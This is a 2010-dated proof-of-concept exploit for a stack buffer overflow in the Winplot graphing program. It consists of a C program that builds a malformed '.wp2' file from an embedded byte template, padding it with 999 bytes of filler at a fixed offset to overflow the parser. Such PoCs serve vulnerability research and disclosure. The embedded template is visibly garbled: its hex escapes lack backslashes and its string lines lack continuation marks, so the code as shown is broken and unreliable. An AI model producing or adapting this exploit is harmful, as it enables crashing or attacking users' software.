# Title : Winplot 2010 Buffer Overflow PoC
# Published : 2010-06-15
# Author : fl0 fl0w
/*
DISCLAIMER
THIS PROGRAM IS NOT INTENDED TO BE USED ON OTHER COMPUTERS AND IT IS DESTINED FOR PERSONAL RESEARCH ONLY!!!!
The programs are provided as is without any guarantees or warranty.
The author is not responsible for any damage or losses of any kind caused by the use or misuse of the programs.
The author is under no obligation to provide support, service, corrections, or upgrades to the free software programs.
Author: fl0 fl0w
Software: Winplot
Dl link: http://math.exeter.edu/rparris/peanut/wp32z.exe
Affected Versions: compiled 7 June 2010
Remote: No
Local: Yes
Class: Boundary Condition Error
Bug: Stack buffer overflow
Affected software: Windows 95/98/ME/2K/XP/Vista/7
Fix: No fix
Compiler: gcc version 3.4.4 (cygming special, gdc 0.12, using dmd 0.125)
Advice: To avoid any problems under Windows, use the cygwin console.
The .C code:
*/
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
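typedef int i32;
typedef char i8;
typedef short i16;
typedef unsigned int ui32;
/* Alphabet used by gen_random(): 62 alphanumerics. sizeof(CHARS) - 1 is the
 * usable length (the string literal's NUL is excluded). The two literals are
 * joined by the preprocessor, so the continuation backslash is required. */
#define CHARS "0123456789ABCDEFGHIJKLMNOPQRST" \
              "UVWXYZabcdefghijklmnopqrstuvwxyz"
/* malloc() n elements of type tip. n is parenthesised so an expression
 * argument multiplies correctly. Returns NULL on failure; callers check. */
#define MEM_ALOC(tip,n) ((tip*)malloc(sizeof(tip)*(n)))
/* Output file written by fl(), relative to the current directory. */
#define POC_NAME "pocfile.wp2"
/* Banner printed by main(). It is printed before fl() runs, so the last line
 * announces the build rather than confirming it. */
#define TITLE "-Winplot 2010 buffer overflow poc\n" \
              "-by fl0 fl0w\n" \
              "-File built\n"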
#define WP2 "x49x03x00x00x24x00x00x00x31x01x00x00x95x00x00x00x80x02x00x00"
"x80x02x00x00x00x00x00x00x01x00x00x00x3dx00x00x00xd9xffxffxff"
"x2cx01x00x00x64x00x00x00x64x00x00x00x00x00x00x00x00x00x00x00"
"x0ax00x00x00x0fx00x00x00x2bxd0x28x01x49x1ex29x01x00x00x00x00"
"x0cx00x00x00x0ax00x00x00x0ax00x00x00x08x00x00x00x0cx00x00x00"
"x0ax00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00"
"xf0xffxffxffx00x00x00x00x00x00x00x00x00x00x00x00x90x01x00x00"
"x00x00x00x00x08x02x01x31x43x6fx75x72x69x65x72x20x4ex65x77x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"xf3xffxffxffx00x00x00x00x00x00x00x00x00x00x00x00x90x01x00x00"
"x00x00x00x02x08x02x01x31x53x79x6dx62x6fx6cx00x20x4ex65x77x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"xf3xffxffxffx00x00x00x00x00x00x00x00x00x00x00x00x90x01x00x00"
"x00x00x00x00x08x02x01x31x43x6fx75x72x69x65x72x20x4ex65x77x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"xf5xffxffxffx00x00x00x00x00x00x00x00x00x00x00x00x90x01x00x00"
"x00x00x00x00x08x02x01x31x43x6fx75x72x69x65x72x20x4ex65x77x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"xf0xffxffxffx00x00x00x00x00x00x00x00x00x00x00x00x90x01x00x00"
"x00x00x00x00x08x02x01x02x54x69x6dx65x73x00x72x20x4ex65x77x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"xf3xffxffxffx00x00x00x00x00x00x00x00x00x00x00x00x90x01x00x00"
"x00x00x00x00x08x02x01x02x54x69x6dx65x73x00x72x20x4ex65x77x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"xf3xffxffxffx00x00x00x00x00x00x00x00x00x00x00x00x90x01x00x00"
"x00x00x00x00x08x02x01x31x43x6fx75x72x69x65x72x20x4ex65x77x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"xf3xffxffxffx00x00x00x00x00x00x00x00x00x00x00x00x90x01x00x00"
"x00x00x00x00x08x02x01x31x43x6fx75x72x69x65x72x20x4ex65x77x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"xf3xffxffxffx00x00x00x00x00x00x00x00x00x00x00x00x90x01x00x00"
"x00x00x00x00x08x02x01x31x43x6fx75x72x69x65x72x20x4ex65x77x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"xf3xffxffxffx00x00x00x00x00x00x00x00x00x00x00x00x90x01x00x00"
"x00x00x00x00x08x02x01x31x43x6fx75x72x69x65x72x20x4ex65x77x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x0cxf2x12x00x5dxddx52x00x08x80x55x00x00x00x00x00x00x0cxf2x12"
"x00x5dxddx52x00x08x80x55x00x00x00x00x00x00x0cxf2x12x00x5dxdd"
"x52x00x08x80x55x00x00x00x00x00x00x0cxf2x12x00x5dxddx52x00x08"
"x80x55x00x00x00x00x00x00x01x00x04x00x06x00x00x00x04x00x06x00"
"x04x00x04x00x00x00x00x00x15x00x04x00x00x00x00x00x00x00x00x00"
"x00x00xffxffxffx00xffx00xffx00xffxffx00x00xffx00x00x00x00xbf"
"x3fx00x00x00xffx00x00x7fx7fx00xffx7fx00x00xffx00x7fx00xa0x2f"
"x00x00x00xffxffx00xbfxbfx7fx00x7fx00x7fx00x20xffx00x00xffx7f"
"x7fx00x87x87x00x00x00x3cxa0x00xe0xe0xe0x00xc0xc0xc0x00xa0xa0"
"xa0x00x80x80x80x00x60x60x60x00x40x40x40x00xbfx00x3fx00x7exde"
"xffx00xffxccxccx00xffx7exdex00xffxdex7ex00xdexffx7ex00x7exff"
"xdex00xffxffxbfx00xffxbfxffx00xbfxffxffx00xffxffxdex00xffxde"
"xffx00xdexffxffx00xb1xdexd4x00xb1xd4xdex00xd4xb1xdex00xd4xde"
"xb1x00xdexb1xd4x00xdexd4xb1x00xbfxf1xdex00xbfxdexf1x00xdexf1"
"xbfx00xdexbfxf1x00xf1xdexbfx00xf1xbfxdex00xffx96xeax00x96xea"
"xffx00xccxccxccx00xc8x70x00x00xdexcdx00x00xdex68x20x00x14x82"
"x28x00xc0x00xa0x00xd4x28x28x00x50x84xb0x00x64xa0xc8x00x14x64"
"x14x00x05x00x7dx00x00x00x01x00x01x00x01x00x0ax00x05x00x02x00"
"xffxffx64x00x03x00x3cx00x07x00x0fx00x01x00x03x00x08x00x0cx00"
"x1ex00x01x00x00x00x00x00x00x00x00x00x00x00x01x00x03x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x01x00"
"x70x00x0cx00x14x00x00x00x00x00x7bx03xffxffx32x00x00x00xb0x00"
"x01x00x00x00x00x00x01x00x00x00xffxffxffxffx00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x01x01x00x00x00x00x01x01x01x00x00x00x00x00"
"x00x01x00x00x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01x01"
"x01x01x01x01x01x01x01x01x01x01x01x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xa0"
"x01x40x00x00x00x00x00x00x00xa0x01xc0x00x00x00x00x00x00x00xa0"
"x01x40x78xb5xb8x09xf3xbbx5ax94x01xc0x78xb5xb8x09xf3xbbx5ax94"
"x01x40x00x00x00x00x00x00x00x80xffx3fx00x00x00x00x00x00x00x80"
"xffx3fx00x00x00x00x00x00x00x80xffx3fx00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00xf0x04x40x00x00x00x00x00x00x00xa0"
"x05x40x00x00x00x00x00x00x00xf0x04x40x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x80x00x40x00x00x00x00x00x00x00x80"
"x00x40x00x00x00x00x00x00x00x80x00x40x00x30x33x33x33x33x33xb3"
"xfex3fx00xd0xccxccxccxccxccxccxfbx3fx00x00x00x00x00x00x00xa0"
"x01x40x00x00x00x00x00x00x00x00x00x00x00xa8x5exdfx9bx4fx77xd6"
"xfbx3fx00x48xe1x7ax14xaex47x81xffx3fx00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x80xffx3fx00x00x00x00x00x00x00xc0"
"xfex3fx7ax00x00x00x00x00xf0xf4x12x00x01x00x00x00x00x00x00x00"
"x80xf6x12x00xd5x4ax40x00x14x03x1cx00xf0xf4x12x00x30x04x54x00"
"xf0x8fx00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xa0"
"x01x40x00x00x00x00x00x00x00xfax08x40x00xd0xccxccxccxccxccxcc"
"xfbx3fx00x00x00x00x00x00x40x9cx0cx40x00x00x00x00x00x00x00xc8"
"x07x40x00x00x00x00x00x00x00x96x06x40x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x80xffx3fx00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00xa0x01x40x00x00x00x00x00x00x00xfa"
"x08x40x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00xa0"
"x01x40x00x00x00x00x00x00x00xc8x05x40x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00xa0x01x40x00x00x00x00x00x00x00xc8"
"x05x40x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x80"
"x00x40x00x00x00x00x00x00x00x80x00x40x00x00x00x00x00x00x00x80"
"x00x40x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00xa0x01x40x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x64x00x00x00x64x00x00x00"
"x64x00x00x00x64x00x00x00x64x00x00x00x64x00x00x00x64x00x00x00"
"x64x00x00x00x64x00x00x00x64x00x00x00x64x00x00x00x64x00x00x00"
"x64x00x00x00x64x00x00x00x64x00x00x00x64x00x00x00x64x00x00x00"
"x64x00x00x00x64x00x00x00x64x00x00x00x64x00x00x00x64x00x00x00"
"x64x00x00x00x64x00x00x00x64x00x00x00x64x00x00x00x64x00x00x00"
"x64x00x00x00x64x00x00x00x64x00x00x00x64x00x00x00x64x00x00x00"
"x64x00x00x00x64x00x00x00x64x00x00x00x64x00x00x00x64x00x00x00"
"x64x00x00x00x64x00x00x00x64x00x00x00x0ax00x00x00x0ax00x00x00"
"x0ax00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00"
"x0ax00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00"
"x0ax00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00"
"x0ax00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00"
"x0ax00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00"
"x0ax00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00"
"x0ax00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00x0ax00x00x00"
"x0ax00x00x00x0ax00x00x00x0ax00x00x00x02x00x78x00x02x00x79x00"
"x02x00x7ax00x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00"
"x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00"
"x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00"
"x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00"
"x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00"
"x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00"
"x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00"
"x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00"
"x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00"
"x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00"
"x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00"
"x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00"
"x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00"
"x00xa0x02xc0x00x00x00x00x00x00x00xa0x02xc0x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x9bx4axbbxa2x58x54xf8xadx00x40x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00xa0x02x40x00x00x00x00x00x00"
"x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40x00x00x00x00x00x00"
"x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40x00x00x00x00x00x00"
"x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40x00x00x00x00x00x00"
"x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40x00x00x00x00x00x00"
"x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40x00x00x00x00x00x00"
"x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40x00x00x00x00x00x00"
"x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40x00x00x00x00x00x00"
"x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40x00x00x00x00x00x00"
"x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40x00x00x00x00x00x00"
"x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40x00x00x00x00x00x00"
"x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40x00x00x00x00x00x00"
"x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40x00x00x00x00x00x00"
"x00xa0x02x40x00x00x00x00x00x00x00xa0x02x40x0cx00x00x00x00x00"
"x00x00xf0xf4x12x00x40xf3x12x00x0cx0cx00x00x00x00x00x00x00xf0"
"xf4x12x00x40xf3x12x00x0cx0cx00x00x00x00x00x00x00xf0xf4x12x00"
"x40xf3x12x00x0cx00x00x00x00x00x00x00x00x00x00x00x00x00x00x01"
"x00x00"
struct nums{
/* Layout of the generated file image. Filled in by val_assign(), read by fl(). */
i32 RND_STR_OFFSET; /* byte offset inside the image where the random filler is copied */
i32 RND_STR_LEN; /* number of random filler bytes produced by gen_random() */
i32 FL_SIZE; /* bytes in the image; also the fwrite() element count */
i32 CHAR_SIZE; /* fwrite() element size (1 in val_assign()) */
}NUM; /* single global instance */
void gen_random(i8*,const int); /* fill len bytes from CHARS via rand(), then NUL-terminate at [len] */
void fl(i8*); /* build the file image and write it to the named file */
void error_handle(void); /* perror() then exit(1); never returns */
void copy_str(i8*,i8*,i32); /* memcpy wrapper: dst, src, byte count */
void val_assign(void); /* store the size/offset constants into the global NUM */
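i32 main(void){
    /* Entry point: print the banner, load the layout constants into NUM,
     * then write POC_NAME into the current directory. fl() leaves the
     * process through error_handle() on any failure, so reaching the
     * return means the file was written. Nothing in this file calls
     * srand(), so the "random" filler is identical on every run. */
    printf("%s", TITLE);
    val_assign();
    fl(POC_NAME);
    return 0;
}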
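void gen_random (i8* s, const int len){
    /* Fill s[0..len-1] with characters drawn from CHARS by rand() and
     * NUL-terminate at s[len]: the caller must provide len + 1 bytes.
     * A NULL buffer or a negative len writes nothing; the original
     * indexed s[len] unconditionally, which is out of bounds for len < 0. */
    if (!s || len < 0) {
        return;
    }
    const size_t alphabet_len = sizeof(CHARS) - 1;   /* drop the literal's NUL */
    for (i32 i = 0; i < len; ++i) {
        s[i] = CHARS[rand() % alphabet_len];
    }
    s[len] = '\0';
}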
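void fl(i8* Fname){
    /* Build the crafted file: copy the WP2 template into an in-memory image,
     * overwrite NUM.RND_STR_LEN bytes at NUM.RND_STR_OFFSET with random
     * alphanumerics, and write the image to Fname. Sizes come from the
     * global NUM, so val_assign() must have run first. Every failure goes
     * through error_handle(), which exits the process; memory still held at
     * that point is reclaimed by the OS. */
    FILE* file = NULL;
    i8* image = NULL;    /* NUM.FL_SIZE bytes: the whole file */
    i8* filler = NULL;   /* NUM.RND_STR_LEN + 1 bytes: gen_random() adds a NUL */

    /* Validate the layout before touching memory: the filler must fit inside
     * the image, the image must not be longer than the WP2 template, and the
     * image is addressed byte-wise so CHAR_SIZE must be 1. */
    if (!Fname
        || NUM.FL_SIZE <= 0 || NUM.RND_STR_LEN < 0 || NUM.RND_STR_OFFSET < 0
        || NUM.RND_STR_OFFSET > NUM.FL_SIZE - NUM.RND_STR_LEN
        || (size_t)NUM.FL_SIZE > sizeof(WP2) - 1
        || NUM.CHAR_SIZE != 1) {
        errno = EINVAL;
        error_handle();
    }

    image = MEM_ALOC(i8, NUM.FL_SIZE);
    if (!image) {
        error_handle();
    }
    /* The original allocated exactly RND_STR_LEN bytes, but gen_random()
     * also stores a NUL at [RND_STR_LEN] — one byte past that allocation. */
    filler = MEM_ALOC(i8, NUM.RND_STR_LEN + 1);
    if (!filler) {
        error_handle();
    }
    file = fopen(Fname, "wb");
    if (!file) {
        error_handle();
    }

    copy_str(image, WP2, NUM.FL_SIZE);
    gen_random(filler, NUM.RND_STR_LEN);
    copy_str(image + NUM.RND_STR_OFFSET, filler, NUM.RND_STR_LEN);

    /* fwrite() may store fewer elements than requested and fclose() performs
     * the final flush, so both results decide whether the file is complete. */
    if (fwrite(image, NUM.CHAR_SIZE, NUM.FL_SIZE, file) != (size_t)NUM.FL_SIZE) {
        error_handle();
    }
    if (fclose(file) != 0) {
        error_handle();
    }
    free(filler);   /* was leaked by the original */
    free(image);
}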
void val_assign(void){
    /* Load the layout of the generated file into the global NUM in one
     * designated assignment: CHAR_SIZE is the fwrite() element size,
     * FL_SIZE the element count (and image length in bytes), and
     * RND_STR_OFFSET / RND_STR_LEN place the random filler inside it. */
    NUM = (struct nums){
        .RND_STR_OFFSET = 1570,
        .RND_STR_LEN = 999,
        .FL_SIZE = 3322,
        .CHAR_SIZE = 1,
    };
}
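void error_handle(void){
    /* Report the last failing call through errno (perror) and abort the
     * run with a non-zero status. Never returns. The message starts with a
     * newline so it lands on its own line after the banner. */
    perror("\nError");
    exit(1);
}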
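void copy_str(char *v, char *w, int len){
    /* Copy len bytes from w to v (regions must not overlap): a memcpy
     * wrapper. i8 and i32 in this file are plain char and int, so the
     * prototype still matches. A NULL pointer or a non-positive len copies
     * nothing — a negative len would otherwise be converted to a huge
     * size_t for memcpy. */
    if (!v || !w || len <= 0) {
        return;
    }
    memcpy(v, w, (size_t)len);
}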